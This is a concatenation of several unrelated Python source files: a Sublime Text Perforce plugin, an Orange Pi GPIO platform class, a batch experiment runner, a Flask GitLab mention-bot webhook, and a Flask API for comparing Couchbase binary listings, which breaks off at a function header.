self._changelistDescriptionOutputPanel.hide()
selectedChangelistNumber = changelists[selectedIndex]['change'] if selectedIndex >= 0 else None
if selectedChangelistNumber == NEW_CHANGELIST_NAME:
self.createChangelist(onCreatedChangelist)
else:
if onDoneCallback and selectedChangelistNumber:
onDoneCallback(selectedChangelistNumber)
SubforceStatusUpdatingEventListener.updateStatus(self._window.active_view())
def onHighlighted(selectedIndex):
self._changelistDescriptionOutputPanel.show(changelists[selectedIndex]['desc'])
changelistItems = [[changelist['change'], changelist['desc'][:250]] for changelist in changelists]
self._window.show_quick_panel(
changelistItems,
onDone,
sublime.KEEP_OPEN_ON_FOCUS_LOST,
0,
onHighlighted
)
def createChangelist(self, onDoneCallback=None):
return self.editChangelist(None, onDoneCallback)
def editChangelist(self, changelistNumber, onDoneCallback=None):
with self._perforceWrapper as p4:
caption = 'New Changelist Description'
description = '<new changelist>'
if changelistNumber:
changeResult = p4.fetch_change(changelistNumber)
caption = 'Changelist {} Description'.format(changelistNumber)
description = changeResult['Description'].strip()
def onDescriptionEntered(desc):
with self._perforceWrapper as p4:
if changelistNumber:
changeResult = p4.fetch_change(changelistNumber)
changeResult['Description'] = desc
changeResult = p4.save_change(changeResult)[0]
else:
changeResult = p4.fetch_change()
changeResult['Description'] = desc
changeResult['Files'] = []
changeResult = p4.save_change(changeResult)[0]
changeResultRE = r'Change (\d+) (updated|created).'
changeResultMatch = re.match(changeResultRE, changeResult)
assert changeResultMatch and changeResultMatch.group(1).isdigit()
newChangeNumber = changeResultMatch.group(1)
if onDoneCallback:
onDoneCallback(newChangeNumber)
if changelistNumber:
self._window.status_message('Edited changelist ' +
newChangeNumber)
else:
self._window.status_message('Created new changelist ' +
newChangeNumber)
self._window.show_input_panel(caption, description,
onDescriptionEntered, None, None)
def deleteChangelist(self, changelistNumber):
with self._perforceWrapper as p4:
p4.run_change("-d", changelistNumber)
def moveToChangelist(self, changelistNumber, file):
with self._perforceWrapper as p4:
p4.run_reopen("-c", changelistNumber, file)
def checkoutInChangelist(self, changelistNumber, path):
with self._perforceWrapper as p4:
if changelistNumber == DEFAULT_CHANGELIST_NAME:
p4.run_edit(path)
else:
p4.run_edit("-c", changelistNumber, path)
def revertFilesInChangelist(self, changelistNumber):
with self._perforceWrapper as p4:
p4.run_revert("-c", changelistNumber, "//...")
def addToChangelist(self, changelistNumber, file):
with self._perforceWrapper as p4:
if changelistNumber == DEFAULT_CHANGELIST_NAME:
p4.run_add(file)
else:
p4.run_add("-c", changelistNumber, file)
class SubforceAutoCheckoutEventListener(sublime_plugin.EventListener):
def on_pre_save(self, view):
if SettingsWrapper().get(DISABLE_AUTO_CHECKOUT_SETTINGS_KEY, False):
return
with PerforceWrapper() as p4:
fileName = view.file_name()
settings = view.settings()
if not fileName or \
settings.get(FILE_NOT_IN_DEPOT_SETTING_KEY, False) or \
settings.get(FILE_CHECKED_OUT_SETTING_KEY, False):
return
# check if file is in depot
if p4.pathUnderRoot(fileName):
stat = p4.run_fstat(fileName)
# check if file is already checked out
if len(stat) > 0 and 'action' in stat[0]:
# Cache this setting, so we don't run fstat unnecessarily
settings.set(FILE_CHECKED_OUT_SETTING_KEY, True)
return
else:
# More caching!
settings.set(FILE_NOT_IN_DEPOT_SETTING_KEY, True)
return
checkoutFile = sublime.ok_cancel_dialog(
"You are saving a file in your depot. Do you want to check it out first?",
"Checkout"
)
if checkoutFile:
# Because Sublime's show_quick_panel is non-blocking, we cannot use it to acquire the user's desired
# changelist before checking out the actual file. Instead, we check out the file first and then move it to
# the user's desired changelist.
p4.run_edit(fileName)
view.settings().set(FILE_CHECKED_OUT_SETTING_KEY, True)
else:
return
moveToChangelist = sublime.ok_cancel_dialog(
"You're file has been checked out in the default changelist. Do you want to move it to another changelist?",
"Move"
)
if moveToChangelist:
view.window().run_command(
"subforce_move_to_changelist",
{
"paths": [fileName]
}
)
@classmethod
def eraseAutoCheckoutEventListenerSettings(cls, view):
settings = view.settings()
settings.erase(FILE_CHECKED_OUT_SETTING_KEY)
settings.erase(FILE_NOT_IN_DEPOT_SETTING_KEY)
def on_load(self, view):
self.eraseAutoCheckoutEventListenerSettings(view)
class SubforceStatusUpdatingEventListener(sublime_plugin.EventListener):
# Some of these may be redundant. Meh.
def on_activated_async(self, view):
self.updateStatus(view)
def on_deactivated_async(self, view):
self.updateStatus(view)
def on_post_window_command(self, window, commandName, args):
if commandName.startswith("subforce"):
self.updateStatus(window.active_view())
@classmethod
def updateStatus(cls, view):
settings = view.settings()
try:
with PerforceWrapper(squelchErrorAndWarningMessages=True) as p4:
stat = None
# check if file is in depot
if p4.pathUnderRoot(view.file_name()):
stat = p4.run_fstat(view.file_name())
stat = stat[0]
else:
return
if "change" in stat:
view.set_status(
CHANGELIST_NUMBER_STATUS_KEY,
"Changelist Number: {}".format(stat['change'])
)
else:
view.erase_status(CHANGELIST_NUMBER_STATUS_KEY)
except P4.P4Exception: # Squelch all Perforce exceptions
pass
class SubforceLoginCommand(sublime_plugin.WindowCommand):
savedPasswordCharacters = []
def run(self):
def onDone(password):
PerforceWrapper().login("".join(self.savedPasswordCharacters))
def onChange(password):
nextPasswordCharacter = password[len(self.savedPasswordCharacters):]
if len(password) < len(self.savedPasswordCharacters):
self.savedPasswordCharacters.pop()
elif len(password) > len(self.savedPasswordCharacters):
self.savedPasswordCharacters.append(nextPasswordCharacter)
else:
return
hiddenPassword = '*' * len(password)
self.window.show_input_panel(
"Password",
hiddenPassword,
onDone,
onChange,
None
)
self.window.show_input_panel(
"Password",
"",
onDone,
onChange,
None
)
class SubforceSyncCommand(sublime_plugin.WindowCommand):
def run(self, paths = []):
with PerforceWrapper() as p4:
paths = coercePathsToActiveViewIfNeeded(paths, self.window)
dirtyOpenFiles = (view.file_name() for window in sublime.windows() for view in window.views() if view.is_dirty())
dirtyFileInSyncPath = False
for dirtyOpenFile in dirtyOpenFiles:
for path in paths:
if os.path.commonprefix([path, dirtyOpenFile]) == path:
dirtyFileInSyncPath = True
break
performSync = not dirtyFileInSyncPath or \
sublime.ok_cancel_dialog("You are about to sync over one or more files with unsaved modifications. Are you sure you want to proceed?")
paths = [ellipsizeIfDirectory(path) for path in paths]
if performSync:
# @TODO: Add a configurable logging system
print("Subforce: syncing\n\t{}".format("\n\t".join(paths)))
p4.run_sync(paths)
class SubforceAddCommand(sublime_plugin.WindowCommand):
def run(self, paths = []):
perforceWrapper = PerforceWrapper()
changelistManager = ChangelistManager(self.window, perforceWrapper)
paths = coercePathsToActiveViewIfNeeded(paths, self.window)
paths = [ellipsizeIfDirectory(path) for path in paths]
def onDoneCallback(selectedChangelistNumber):
print("Subforce: adding\n\t{}\nto changelist {}: ".format("\n\t".join(paths), selectedChangelistNumber))
changelistManager.addToChangelist(selectedChangelistNumber, paths)
changelistManager.viewAllChangelists(onDoneCallback, includeNew=True, includeDefault=True)
class SubforceGetRevisionCommand(sublime_plugin.WindowCommand):
def run(self, paths):
perforceWrapper = PerforceWrapper()
revisionManager = RevisionManager(self.window, perforceWrapper)
with perforceWrapper as p4:
paths = coercePathsToActiveViewIfNeeded(paths, self.window)
path = checkForAndGetSinglePath(paths)
if not path:
return
path = ellipsizeIfDirectory(path)
def onDoneCallback(selectedRevision):
revisionManager.getRevision(selectedRevision, path)
revisionManager.showHaveHeadAndFileRevisions(path, onDoneCallback)
class SubforceCheckoutCommand(sublime_plugin.WindowCommand):
def run(self, paths = []):
perforceWrapper = PerforceWrapper()
changelistManager = ChangelistManager(self.window, perforceWrapper)
paths = coercePathsToActiveViewIfNeeded(paths, self.window)
paths = [ellipsizeIfDirectory(path) for path in paths]
def onDoneCallback(selectedChangelistNumber):
print("Subforce: checking out\n\t{}\nin changelist {}: ".format("\n\t".join(paths), selectedChangelistNumber))
changelistManager.checkoutInChangelist(selectedChangelistNumber, paths)
changelistManager.viewAllChangelists(onDoneCallback, includeNew=True, includeDefault=True)
class SubforceRevertCommand(sublime_plugin.WindowCommand):
def run(self, paths = []):
with PerforceWrapper() as p4:
paths = coercePathsToActiveViewIfNeeded(paths, self.window)
ellipsizedPaths = [ellipsizeIfDirectory(path) for path in paths]
print("Subforce: reverting\n\t{}".format("\n\t".join(ellipsizedPaths)))
p4.run_revert(ellipsizedPaths)
self._resetAutoCheckoutEventListenerSettingsForAllViews(paths)
def _resetAutoCheckoutEventListenerSettingsForAllViews(self, paths):
for path in paths:
for view in getAllViewsForPath(path):
SubforceAutoCheckoutEventListener.eraseAutoCheckoutEventListenerSettings(view)
class SubforceRenameCommand(sublime_plugin.WindowCommand):
def run(self, paths = []):
perforceWrapper = PerforceWrapper()
changelistManager = ChangelistManager(self.window, perforceWrapper)
with perforceWrapper as p4:
paths = coercePathsToActiveViewIfNeeded(paths, self.window)
path = checkForAndGetSinglePath(paths)
if not path:
return
path = ellipsizeIfDirectory(path)
if not p4.pathUnderRoot(path):
requiresCheckout = True
else:
requiresCheckout = False
if requiresCheckout and not \
sublime.ok_cancel_dialog(
"File must be checked out before it can be renamed. Do you want to check it out now?",
"Checkout"
):
return
def renameFile(file):
def onDoneRenameCallback(newFileName):
with perforceWrapper as p4: # necessary because the callback runs in a different thread
p4.run_rename(file, newFileName)
self.window.show_input_panel(
"New File Name",
file,
onDoneRenameCallback,
None,
None
)
if requiresCheckout:
def onDoneViewingChangelistsCallback(selectedChangelistNumber):
changelistManager.checkoutInChangelist(selectedChangelistNumber, path)
renameFile(path)
changelistManager.viewAllChangelists(onDoneViewingChangelistsCallback, includeNew=True, includeDefault=True)
else:
renameFile(path)
class SubforceViewChangelistsCommand(sublime_plugin.WindowCommand):
def run(self):
perforceWrapper = PerforceWrapper()
ChangelistManager(self.window, perforceWrapper).viewAllChangelists(None)
class SubforceCreateChangelistCommand(sublime_plugin.WindowCommand):
def run(self):
perforceWrapper = PerforceWrapper()
ChangelistManager(self.window, perforceWrapper).createChangelist()
class SubforceEditChangelistCommand(sublime_plugin.WindowCommand):
def run(self):
perforceWrapper = PerforceWrapper()
changelistManager = ChangelistManager(self.window, perforceWrapper)
def onDoneCallback(selectedChangelistNumber):
print("Subforce: editing {}".format(selectedChangelistNumber))
changelistManager.editChangelist(selectedChangelistNumber)
changelistManager.viewAllChangelists(onDoneCallback)
class SubforceDeleteChangelistCommand(sublime_plugin.WindowCommand):
def run(self):
perforceWrapper = PerforceWrapper()
changelistManager = ChangelistManager(self.window, perforceWrapper)
def onDoneCallback(selectedChangelistNumber):
print("Subforce: deleting {}".format(selectedChangelistNumber))
changelistManager.deleteChangelist(selectedChangelistNumber)
changelistManager.viewAllChangelists(onDoneCallback)
class SubforceMoveToChangelistCommand(sublime_plugin.WindowCommand):
def run(self, paths=[]):
perforceWrapper = PerforceWrapper()
changelistManager = ChangelistManager(self.window, perforceWrapper)
paths = coercePathsToActiveViewIfNeeded(paths, self.window)
paths = [ellipsizeIfDirectory(path) for path in paths]
def onDoneCallback(selectedChangelistNumber):
print("Subforce: moving\n\t{}\nto changelist {}".format("\n\t".join(paths), selectedChangelistNumber))
changelistManager.moveToChangelist(selectedChangelistNumber, paths)
changelistManager.viewAllChangelists(onDoneCallback, includeNew=True, includeDefault=True)
class SubforceRevertFilesInChangelistCommand(sublime_plugin.WindowCommand):
def run(self):
perforceWrapper = PerforceWrapper()
changelistManager = ChangelistManager(self.window, perforceWrapper)
def onDoneCallback(selectedChangelistNumber):
print("Subforce: reverting files in {}".format(selectedChangelistNumber))
changelistManager.revertFilesInChangelist(selectedChangelistNumber)
changelistManager.viewAllChangelists(onDoneCallback)
def executeP4VCCommand(command, *args):
with PerforceWrapper() as p4:
command = " ".join(["p4vc.exe", command] + list(args))
print("Subforce: executing p4vc command '{}'".format(command))
process = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True, cwd=p4.cwd)
stdout, stderr = process.communicate()
if stdout:
print(stdout)
if stderr:
print(stderr)
def executeP4VCommand(command, *args):
# See: https://www.perforce.com/blog/vcs/p4v-secrets-calling-p4v-command-line
with PerforceWrapper() as p4:
command = 'p4v.exe -p {} -c {} -u {} -cmd "{}"'.format(
p4.port,
p4.client,
p4.user,
' '.join([command] + list(args))
)
print("Subforce: executing p4v command '{}'".format(command))
process = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True, cwd=p4.cwd)
class SubforceViewRevisionHistoryCommand(sublime_plugin.WindowCommand):
def run(self, paths=[]):
paths = coercePathsToActiveViewIfNeeded(paths, self.window)
for path in paths:
executeP4VCommand("history", path)
class SubforceViewTimelapseCommand(sublime_plugin.WindowCommand):
def run(self, paths=[]):
paths = coercePathsToActiveViewIfNeeded(paths, self.window)
for path in paths:
executeP4VCommand("annotate", path)
class SubforceSubmitChangelistCommand(sublime_plugin.WindowCommand):
def run(self):
perforceWrapper = PerforceWrapper()
changelistManager = ChangelistManager(self.window, perforceWrapper)
def onDoneCallback(selectedChangelistNumber):
if selectedChangelistNumber:
executeP4VCCommand("submit", "-c", selectedChangelistNumber)
changelistManager.viewAllChangelists(onDoneCallback)
class SubforceResolveCommand(sublime_plugin.WindowCommand):
def run(self, paths=[]):
paths = coercePathsToActiveViewIfNeeded(paths, self.window)
executeP4VCCommand("resolve", " ".join(paths))
class RevisionManager:
def __init__(self, window, perforceWrapper):
self._window = window
self._perforceWrapper = perforceWrapper
self._revisionDescriptionOutputPanel = DescriptionOutputPanel(self._window)
self._callbackDepth = 0
def diffClientFileAgainstDepotRevision(self, revision, file):
with self._perforceWrapper as p4:
depotFilePath = p4.run_fstat(file)[0]['depotFile']
temporaryDepotFilePath = self._createTemporaryDepotFile(depotFilePath, revision)
self._startP4MergeThread(
temporaryDepotFilePath,
file,
getRevisionQualifiedDepotPath(depotFilePath, revision),
"{} (workspace file)".format(file)
)
def diffDepotRevisions(self, revision1, revision2, file):
with self._perforceWrapper as p4:
(revision1, revision2) = sorted([revision1, revision2]) # ensures the most recent revision is on the right
depotFilePath = p4.run_fstat(file)[0]['depotFile']
temporaryDepotFilePath1 = self._createTemporaryDepotFile(depotFilePath, revision1)
temporaryDepotFilePath2 = self._createTemporaryDepotFile(depotFilePath, revision2)
self._startP4MergeThread(
temporaryDepotFilePath1,
temporaryDepotFilePath2,
getRevisionQualifiedDepotPath(depotFilePath, revision1),
getRevisionQualifiedDepotPath(depotFilePath, revision2)
)
def showHaveHeadRevisions(self, onDoneCallback):
revisions = [{'revision': HAVE_REVISION_NAME, 'desc': HAVE_REVISION_DESCRIPTION}, {'revision': HEAD_REVISION_NAME, 'desc': HEAD_REVISION_DESCRIPTION}]
self._showRevisions(revisions, onDoneCallback)
def showHaveHeadAndFileRevisions(self, file, onDoneCallback):
with self._perforceWrapper as p4:
revisions = [createRevision(HAVE_REVISION_NAME, HAVE_REVISION_DESCRIPTION), createRevision(HEAD_REVISION_NAME, HEAD_REVISION_DESCRIPTION)]
revisions.extend(
[
createRevision(str(revision.rev), revision.desc)
for revision in p4.run_filelog("-l", file)[0].revisions
]
)
self._showRevisions(revisions, onDoneCallback)
def getRevision(self, revision, file):
with self._perforceWrapper as p4:
depotFilePath = p4.run_fstat(file)[0]['depotFile']
p4.run_sync(getRevisionQualifiedDepotPath(depotFilePath, revision))
def _showRevisions(self, revisions, onDoneCallback):
self._callbackDepth += 1
def onDone(selectedIndex):
selectedRevision = revisions[selectedIndex]['revision'] if selectedIndex >= 0 else None
if onDoneCallback and selectedRevision:
onDoneCallback(selectedRevision)
if self._callbackDepth == 1: # last one out turns off the lights.
self._revisionDescriptionOutputPanel.hide()
self._callbackDepth -= 1
def onHighlighted(selectedIndex):
self._revisionDescriptionOutputPanel.show(revisions[selectedIndex]['desc'])
revisionItems = [[revision['revision'], revision['desc'][:250]] for revision in revisions]
self._window.show_quick_panel(
revisionItems,
onDone,
sublime.KEEP_OPEN_ON_FOCUS_LOST,
0,
onHighlighted
)
def _startP4MergeThread(self, leftFile, rightFile, leftFileAlias, rightFileAlias):
def target():
command = ["p4merge.exe", '-nl', leftFileAlias, '-nr', rightFileAlias, leftFile, rightFile]
process = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout, stderr = process.communicate()
if stdout:
print(stdout)
if stderr:
print(stderr)
threading.Thread(target=target).start()
def _createTemporaryDepotFile(self, file, revision):
with self._perforceWrapper as p4:
# @TODO: At some point in time, we may want to create temporary files with the same naming convention as p4v.
with tempfile.NamedTemporaryFile(prefix="subforce_", delete=False) as temporaryFile:
depotFilePath = getRevisionQualifiedDepotPath(file, revision)
depotFileText = p4.run_print(depotFilePath)[1]
temporaryFile.write(bytes(depotFileText, 'UTF-8'))
return temporaryFile.name
class SubforceViewGraphicalDiffWorkspaceFileCommand(sublime_plugin.WindowCommand):
'''
Diffs one or more files against a depot revision.
A single file may be diffed against any revision.
Multiple files may only be diffed against the have or head revisions.
'''
def run(self, paths=[]):
perforceWrapper = PerforceWrapper()
revisionManager = RevisionManager(self.window, perforceWrapper)
paths = coercePathsToActiveViewIfNeeded(paths, self.window)
if len(paths) == 1:
path = paths[0]
def onDoneCallback(selectedRevision):
revisionManager.diffClientFileAgainstDepotRevision(selectedRevision, path)
revisionManager.showHaveHeadAndFileRevisions(path, onDoneCallback)
else:
def onDoneCallback(selectedRevision):
for path in paths:
revisionManager.diffClientFileAgainstDepotRevision(selectedRevision, path)
revisionManager.showHaveHeadRevisions(onDoneCallback)
class SubforceViewGraphicalDiffDepotRevisionsCommand(sublime_plugin.WindowCommand):
'''
Diffs two depot revisions of a given file.
Only a single file may be diffed at a time.
'''
def run(self, paths=[]):
perforceWrapper = PerforceWrapper()
revisionManager = RevisionManager(self.window, perforceWrapper)
paths = coercePathsToActiveViewIfNeeded(paths, self.window)
path = checkForAndGetSinglePath(paths)
if not path:
return
def onDoneCallback1(selectedRevision1):
def onDoneCallback2(selectedRevision2):
revisionManager.diffDepotRevisions(selectedRevision1, selectedRevision2, path)
revisionManager.showHaveHeadAndFileRevisions(path, onDoneCallback2)
revisionManager.showHaveHeadAndFileRevisions(path, onDoneCallback1)
|
orangepiplatform.py
|
import time
import threading
from pyA20.gpio import gpio as GPIO # pylint: disable=import-error
from .rpilikeplatform import RPiLikePlatform
class OrangepiPlatform(RPiLikePlatform):
def __init__(self, config):
super(OrangepiPlatform, self).__init__(config, 'orangepi', GPIO)
def setup(self):
GPIO.init()
GPIO.setcfg(self._pconfig['button'], GPIO.INPUT)
GPIO.pullup(self._pconfig['button'], GPIO.PULLUP)
GPIO.setcfg(self._pconfig['rec_light'], GPIO.OUTPUT)
GPIO.setcfg(self._pconfig['plb_light'], GPIO.OUTPUT)
def after_setup(self, trigger_callback=None):
self._trigger_callback = trigger_callback
if self._trigger_callback:
thread = threading.Thread(target=self.wait_for_button, args=())
thread.daemon = True
thread.start()
def wait_for_button(self):
while True:
if GPIO.input(self._pconfig['button']) == 0:
self.detect_button()
time.sleep(.1)
def cleanup(self):
GPIO.output(self._pconfig['rec_light'], GPIO.LOW)
GPIO.output(self._pconfig['plb_light'], GPIO.LOW)
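# Illustrative _pconfig contents (the pin numbers below are hypothetical placeholders):
#   {'button': 12, 'rec_light': 5, 'plb_light': 6}
# setup() configures the button as a pulled-up input and both lights as outputs.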
|
run_batch_experiments.py
|
import os, sys, signal
import random
import numpy as np
from multiprocessing import Process, Queue, current_process, freeze_support
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('--method', type=str, default='ours')
parser.add_argument('--num-seeds', type=int, default=5)
parser.add_argument('--num-processes', type=int, default=1)
parser.add_argument('--save-dir', type=str, default='./results/2021-02-20/')
args = parser.parse_args()
''' generate seeds '''
seeds = []
for i in range(args.num_seeds):
seeds.append(i * 10)
''' generate commands '''
commands = []
for i in range(args.num_seeds):
seed = seeds[i]
save_dir = os.path.join(args.save_dir, args.method, str(seed))
if args.method == 'ours':
cmd = 'python example_finger_flip.py '\
'--seed {} '\
'--save-dir {} '\
'--visualize False'\
.format(seed, save_dir)
elif args.method == 'control-only':
cmd = 'python example_finger_flip.py '\
'--seed {} '\
'--save-dir {} '\
'--no-design-optim '\
'--visualize False'\
.format(seed, save_dir)
elif args.method == 'CMA':
cmd = 'python grad_free.py '\
'--seed {} '\
'--save-dir {} '\
'--optim CMA '\
'--max-iters 10000 '\
'--popsize 20 '\
'--visualize False'\
.format(seed, save_dir)
elif args.method == 'OnePlusOne':
cmd = 'python grad_free.py '\
'--seed {} '\
'--save-dir {} '\
'--optim OnePlusOne '\
'--max-iters 10000 '\
'--visualize False'\
.format(seed, save_dir)
commands.append(cmd)
def worker(input, output):
for cmd in iter(input.get, 'STOP'):
ret_code = os.system(cmd)
if ret_code != 0:
output.put('killed')
break
output.put('done')
# Create queues
task_queue = Queue()
done_queue = Queue()
# Submit tasks
for cmd in commands:
task_queue.put(cmd)
# Submit stop signals
for i in range(args.num_processes):
task_queue.put('STOP')
# Start worker processes
for i in range(args.num_processes):
Process(target=worker, args=(task_queue, done_queue)).start()
# Get and print results
for i in range(args.num_processes):
print(f'Process {i}', done_queue.get())
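# Example invocation (illustrative; flag values are arbitrary):
#   python run_batch_experiments.py --method CMA --num-seeds 5 --num-processes 2
# Each seed (0, 10, 20, ...) becomes one command; workers pull commands from the task
# queue until they hit a 'STOP' sentinel and report 'done' or 'killed' per process.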
|
app.py
|
#!/usr/bin/env python
# coding: utf-8
import os
import json
import logging
from queue import Queue, Empty
from threading import Thread
import datetime
import math
import time
import argparse
import copy
from flask import Flask, request
## setup logging
parser = argparse.ArgumentParser()
subparsers = parser.add_subparsers(help='Startup Mode')
group = parser.add_mutually_exclusive_group()
group.add_argument('-listen', action='store_true', default=False)
group.add_argument('-quick-check', action='store_true', default=False)
args = parser.parse_args() if __name__ == '__main__' else None
import logging.config
logging.config.dictConfig({
'version': 1,
'disable_existing_loggers': False,
'formatters': {
'basic': {
'format':
'%(levelname)s %(asctime)s %(filename)s:%(lineno)d '
'%(message)s'
},
},
'handlers': {
'console': {
'level': 'DEBUG',
'class': 'logging.StreamHandler',
'formatter': 'basic'
},
'file': {
'class': 'logging.handlers.RotatingFileHandler',
'formatter': 'basic',
'filename': '/tmp/mention-bot-hook.log'
if args and args.listen else '/tmp/mention-bot-checks.log',
'maxBytes': 100*1024*1024,
'backupCount': 30
}
},
'root': {
'level': 'INFO',
'handlers': ['console', 'file']
}
})
logger = logging.getLogger()
## end logging setup
from mention import gitlab_client
from mention import mention_bot
from mention import config
from mention import helper
app = Flask(__name__)
_STOP_PROCESS = False
enclosure_queue = Queue()
@app.route('/check_health', methods=['GET'])
def check_health():
return "mention-bot"
@app.route('/', methods=['GET'])
def mentionbot():
return "Gitlab Mention Bot active"
@app.route('/', methods=['POST'])
def webhook():
event = request.headers.get('X-Gitlab-Event')
if not event:
return '', 400
if event != 'Merge Request Hook':
return '', 200
# add payload to queue so that _payload_worker(q) can process it in
# a separate thread
payload = json.loads(request.data)
enclosure_queue.put((datetime.datetime.now(), payload))
return "", 200
def _manage_payload(payload):
logger.info('_' * 80)
logger.info('Received payload<{}>: {}'.format(
id(payload), helper.load_dict_as_yaml(payload)))
username = payload['user']['username']
project_id = payload['object_attributes']['target_project_id']
target_branch = payload['object_attributes']['target_branch']
namespace = payload['object_attributes']['target']['path_with_namespace']
merge_request_id = payload['object_attributes']['iid']
# loading config
logger.info('Current Action={}'.format(
payload['object_attributes']['action']))
try:
cfg = mention_bot.get_repo_config(project_id, target_branch,
config.CONFIG_PATH)
diff_files = mention_bot.get_diff_files(project_id, merge_request_id)
logging.info(
f'PiD: {project_id}, IID: {merge_request_id}; files={diff_files}')
if mention_bot.is_valid(cfg, payload):
owners = mention_bot.guess_owners_for_merge_reqeust(
project_id, namespace, target_branch, merge_request_id,
username, cfg, diff_files)
if owners:
logging.info(f'owners = {owners}; username={username}')
mention_bot.add_comment(project_id, merge_request_id, username,
owners, cfg)
else:
logging.info(f'No Owners found: PiD:{project_id}; MID:{merge_request_id}, username: {username}')
if payload['object_attributes']['action'] in [
'open', 'reopen', 'closed', 'close', 'merge'
]:
mention_bot.manage_labels(payload, project_id, merge_request_id,
cfg, diff_files)
except gitlab_client.ConfigSyntaxError as e:
gitlab_client.add_comment_merge_request(project_id, merge_request_id,
e.message)
def _check_and_sleep(ts):
now = datetime.datetime.now()
exp_ts = datetime.timedelta(seconds=10) + ts
if exp_ts > now:
should_wait = math.ceil((exp_ts - now).total_seconds())
if should_wait:
logger.info('ts={}; now={}; sleeping for: {}'.format(
ts, now, should_wait))
time.sleep(should_wait)
def _payload_worker(q):
# this worker is needed solely because sometimes the MR comes in too fast,
# and gitlab queries fail. So let's add a delay of 10s, to ensure that
# all updates work.
logger.info('Looking for next payload')
global _STOP_PROCESS
while not _STOP_PROCESS:
try:
payload_ts, payload = q.get(timeout=2)
logger.info('Looking for next payload')
logger.info('Payload found: at ts={}; id={}'.format(
payload_ts, id(payload)))
_check_and_sleep(payload_ts)
try:
_manage_payload(payload)
except Exception as e:
logger.error(f'Exception with the message: {str(e)}')
q.task_done()
except Empty:
pass
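# Flow sketch (illustrative summary of the code above): webhook() enqueues
# (timestamp, payload); _payload_worker() waits until at least 10 seconds have passed
# since that timestamp (via _check_and_sleep) before calling _manage_payload, giving
# GitLab time to settle after the merge request event.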
def main():
# setup thread to handle the payloads
worker = Thread(target=_payload_worker, args=(enclosure_queue, ))
worker.daemon = True
worker.start()
app.run(host='0.0.0.0')
global _STOP_PROCESS
_STOP_PROCESS = True
logger.info('Stopping worker...')
worker.join()
logger.info('worker stopped...')
if __name__ == '__main__':
logger.info(f'args = {args}...')
config.check_config()
if args.listen:
main()
if args.quick_check:
mention_bot.check_merge_requests('p/higgs')
|
api.py
|
#!/usr/bin/env python3
import binaries
import db
import flask
import json
import os
import redis
import threading
import time
from ast import literal_eval
from celery import Celery
from flask import request
from flask_cors import CORS, cross_origin
from shutil import copy
queue_poll_interval = 10
default_product = "couchbase-server"
default_edition = "enterprise"
celery = Celery(broker='redis://redis//')
r = redis.StrictRedis(host='redis', port=6379)
app = flask.Flask(__name__)
app.config['CORS_HEADERS'] = 'Content-Type'
app.config["DEBUG"] = True
cors = CORS(app)
queue = []
@app.route('/', methods=['GET'])
@cross_origin()
def api_home():
return ""
@app.route('/api/v1/queue', methods=['GET'])
@cross_origin()
def api_queue():
""" Return a list of currently processed/queued jobs """
return json.dumps(queue)
@app.route('/api/v1/distros', methods=['GET'])
@cross_origin()
def api_distros():
""" Retrieve a list of distros for which file lists have been gathered """
return json.dumps([d[0] for d in db.query(
"SELECT UNIQUE(distro) FROM listings WHERE status='ok' ORDER by distro ASC"
)])
@app.route('/api/v1/versions', methods=['GET'])
@cross_origin()
def api_versions():
""" Retrieve a list of versions (optionally for a given distro) """
[distro, product] = map(request.args.get, ['distro', 'product'])
if not product:
product = default_product
if distro:
results = db.query(
"SELECT UNIQUE(version) FROM listings WHERE status='ok' AND product=%s AND distro=%s ORDER by version ASC",
(product, distro,)
)
else:
results = db.query(
"SELECT UNIQUE(version) FROM listings WHERE product=%s AND status='ok' ORDER by version ASC",
(product, )
)
if results:
return json.dumps([v[0] for v in results])
return json.dumps({})
@app.route('/api/v1/listing', methods=['GET', 'POST'])
@cross_origin()
def api_listing():
"""
GET: Retrieve a file/folder listing for a given distro + product + version + edition [+ build]
POST: Remove any existing record, and add a listing to the database
"""
global queue
if request.method == "GET":
[distro, product, version, build, edition, force] = map(
request.args.get, ['distro', 'product', 'version', 'build', 'edition', 'force'])
if not all([distro, version]):
return {"error": "distro and version must be provided."}
if version.find("-") > 0:
[version, build] = version.split("-")
else:
build = "GA"
if not product:
product = default_product
if not edition:
edition = default_edition
return str(binaries.get_files(
distro=distro, product=product, edition=edition, version=version, build=build, force=force, queue=queue
))
elif request.method == "POST":
payload = json.loads(request.form.get('payload'))
db.exec(
"DELETE FROM listings WHERE product=%s and edition=%s and version=%s and build=%s and distro=%s",
(payload['product'], payload['edition'],
payload['version'], payload['build'], payload['distro'])
)
db.exec(
"INSERT INTO listings(status, product, edition, version, build, distro, files, url, runcmd, msg) VALUES(%s, %s, %s, %s, %s, %s, %s, %s, %s, %s)",
(payload['status'], payload['product'], payload['edition'], payload['version'], payload['build'],
payload['distro'], json.dumps(payload['files']), payload['url'], payload['runcmd'], payload['msg'])
)
return {}
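# Example requests (illustrative; the parameter values are hypothetical):
#   GET  /api/v1/listing?distro=centos7&version=7.0.0-4291
#        -> listing for build 4291 (a bare version such as 7.0.0 is treated as the GA build)
#   POST /api/v1/listing  with a form field "payload" holding the JSON record to store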
@app.route('/api/v1/compare', methods=['GET'])
@cross_origin()
def api_compare():
""" Retrieve a comparison between two versions """
global queue
[distro, product, from_version, to_version, edition] = map(
request.args.get, ['distro', 'product', 'from_version', 'to_version', 'edition'])
if from_version and to_version:
if "-" not in from_version:
from_version = f"{from_version}-GA"
if "-" not in to_version:
to_version = f"{to_version}-GA"
[from_version, from_build] = from_version.split("-")
[to_version, to_build] = to_version.split("-")
from_listing = json.loads(binaries.get_files(
distro, product, edition, from_version, from_build, queue=queue))
to_listing = json.loads(binaries.get_files(
distro, product, edition, to_version, to_build, queue=queue))
new_binaries = list(
set(to_listing['files']) - set(from_listing['files']))
removed_binaries = list(
set(from_listing['files']) - set(to_listing['files']))
# note: paths aren't actually stored in the database. We figure those
# out as a convenience in binaries.py/get_files()
new_binary_dirs = list(
set(to_listing['paths']) - set(from_listing['paths']))
removed_binary_dirs = list(
set(from_listing['paths']) - set(to_listing['paths']))
return json.dumps({
"distro": distro,
"from_version": from_version,
"from_build": from_build,
"to_version": to_version,
"to_build": to_build,
"new_binary_dirs": sorted(new_binary_dirs),
"removed_binary_dirs": sorted(removed_binary_dirs),
"new_binaries": sorted(new_binaries),
"removed_binaries": sorted(removed_binaries),
})
else:
return {"error": "from and to must be provided."}
def monitor_queue():
